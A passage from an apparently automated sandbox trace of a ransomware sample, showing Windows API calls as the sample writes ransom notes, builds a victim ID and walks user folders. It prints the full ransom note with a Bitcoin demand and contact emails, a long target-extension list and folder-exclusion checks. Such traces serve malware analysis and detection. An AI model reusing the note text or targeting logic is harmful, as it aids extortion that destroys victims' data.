daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0189.870] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0189.870] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0189.870] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0189.870] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Downloads" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads"
	[0189.870] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*"
	[0189.870] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.871] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.871] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT") returned 59
	[0189.871] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0189.873] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0189.873] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0189.875] CloseHandle (hObject=0x380) returned 1
	[0189.876] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.876] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.876] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0189.877] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0189.877] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0189.878] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0189.878] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0189.878] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0189.878] CloseHandle (hObject=0x380) returned 1
	[0189.878] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.879] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.879] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0189.879] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML") returned 60
	[0189.879] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0189.883] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0189.883] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0189.886] CloseHandle (hObject=0x380) returned 1
	[0189.886] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.886] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.887] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.887] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0189.888] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0189.888] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0189.888] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0189.888] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0189.888] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0189.888] CloseHandle (hObject=0x380) returned 1
	[0189.889] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8ab5d170, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0189.889] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*") returned 35
	[0189.889] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.889] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Downloads\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\rdhj0cnfevzx\\downloads\\*.*") returned 0x23
	[0189.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.889] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="windows") returned 0x0
	[0189.889] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.890] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="boot") returned 0x0
	[0189.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.890] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="system volume information") returned 0x0
	[0189.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.890] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0189.890] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.890] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="temp") returned 0x0
	[0189.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.891] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="program files") returned 0x0
	[0189.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.891] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="program files (x86)") returned 0x0
	[0189.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.891] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="appdata") returned 0x0
	[0189.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.891] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="application data") returned 0x0
	[0189.891] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.892] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="winnt") returned 0x0
	[0189.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.892] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="tmp") returned 0x0
	[0189.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.892] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="cache") returned 0x0
	[0189.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.892] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="temporary internet files") returned 0x0
	[0189.892] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.893] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="webcache") returned 0x0
	[0189.893] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.900] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="inetcache") returned 0x0
	[0189.900] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.900] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="nvidia") returned 0x0
	[0189.900] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.901] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="packages") returned 0x0
	[0189.901] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.901] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="cookies") returned 0x0
	[0189.901] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.901] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\downloads\\*.*", lpSrch="programdata") returned 0x0
	[0189.901] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0189.901] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0189.901] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8ab5d170, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0189.902] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0189.902] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0189.902] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab5d170, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ab5d170, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ab5d170, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0189.902] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab372c7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ab372c7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ab5d170, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0189.902] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab372c7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ab372c7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8ab5d170, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0189.902] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0189.902] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0189.902] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0189.903] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1
	[0189.903] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1
	[0189.903] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0189.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0189.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Favorites" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites"
	[0189.903] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites"
	[0189.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\"
	[0189.903] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\"
	[0189.903] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*"
	[0189.904] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0189.904] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\*.*") returned 35
	[0189.904] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
